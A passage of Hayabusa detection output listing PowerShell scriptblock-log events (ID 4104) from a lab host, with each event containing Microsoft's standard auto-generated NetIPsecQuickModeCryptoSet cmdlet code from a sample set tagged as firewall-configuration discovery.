$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = 
Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
